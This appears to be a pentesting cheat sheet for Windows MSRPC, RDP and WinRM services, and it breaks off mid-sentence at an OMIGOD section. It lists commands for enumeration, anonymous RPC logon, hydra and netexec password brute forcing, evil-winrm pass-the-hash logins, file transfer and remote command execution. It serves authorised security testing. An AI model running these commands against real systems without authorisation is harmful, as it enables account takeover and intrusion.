MSRPC (Microsoft Remote Procedure Call) Pentesting

It is also known as a function call or a subroutine call. Default ports are 135, 593.

Enumeration

nmap --script msrpc-enum -p 135 <target-ip>

RPC Endpoints

To enumerate RPC endpoints, use impacket-rpcdump.

impacket-rpcdump -port 135 <target-ip> | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR'

MS-EFSRPC: It might be vulnerable to PetitPotam.
MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare.

Metasploit

msfconsole
msf> use auxiliary/scanner/dcerpc/endpoint_mapper
msf> use auxiliary/scanner/dcerpc/hidden
msf> use auxiliary/scanner/dcerpc/management
msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

Connect

# Anonymous logon
rpcclient -N -U "" <target-ip>
rpcclient -N -U "" -p 593 <target-ip>
rpcclient -N -U "" dc.example.local

# Specify username
# -W: Workgroup
# -N: No password
rpcclient -U username <target-ip>
rpcclient -W WORKGROUP -U username <target-ip>
rpcclient -U username -N <target-ip>

# -k: Kerberos authentication
rpcclient -k <target-ip>

Commands

# Server info
rpcclient $> srvinfo

# Enumerate domains
rpcclient $> enumdomains
# Enumerate domain users
rpcclient $> enumdomusers
# Enumerate domain groups
rpcclient $> enumdomgroups

# Domain info
rpcclient $> querydominfo

# Current username
rpcclient $> getusername

RDP (Remote Desktop Protocol) Pentesting

RDP is a protocol that provides a user with a graphical interface to connect to another computer over a network connection. A default port is 3389.

Enumeration

nmap --script rdp-enum-encryption -p 3389 <target-ip>
nmap --script rdp-ntlm-info -p 3389 <target-ip>
nmap --script rdp* -p 3389 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp

Connect

Remmina

Remmina is a remote desktop client for POSIX-based computer operating systems.

remmina

# -c: Connect given URI or file
remmina -c rdp://username@vulnerable.com
remmina -c rdp://domain\\username@vulnerable.com
remmina -c rdp://username:password@vulnerable.com

# ---------------------------------------------------------------------------------

# Settings

# Keyboard mapping
1. On Remmina client window, click menu icon and move to "Preferences".
2. Navigate to "RDP" tab and check "Use client keyboard mapping".
3. Reboot Remmina

FreeRDP

xfreerdp /u:username /v:10.0.0.1:3389
xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea
# Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME)
xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1
# Useful command for exploiting
xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

# --------------------------------------------------------------------------------

# On remote Windows

# Access share directory in Command Prompt or PowerShell
\\tsclient\\~share\

Rdesktop

rdesktop -u username -p password 10.0.0.1:3389

WinRM (Windows Remote Management) Pentesting

description: The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.

CVE-2021-38647

Enumeration

Brute Force Credentials

netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt 

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login

Connect with Evil-WinRM

Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.

Connect

evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S

If you have private key and public key, you can use them for authentication.

# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key

Commands

After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.

# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services

Command Execution with NetExec

# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'

# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'

OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance: